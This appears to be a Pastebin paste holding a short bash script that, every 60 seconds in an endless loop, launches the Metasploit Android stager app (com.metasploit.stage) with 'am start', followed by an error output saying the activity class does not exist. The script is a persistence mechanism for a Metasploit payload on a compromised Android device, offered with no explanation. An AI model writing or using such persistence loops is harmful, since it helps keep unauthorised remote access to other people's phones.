Advertisement
Guest User

Untitled

a guest
Jul 18th, 2019
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. #!/bin/bash
  2. while true
  3. do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
  4. sleep 60
  5. done
  6.  
  7. Error type 3
  8. Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement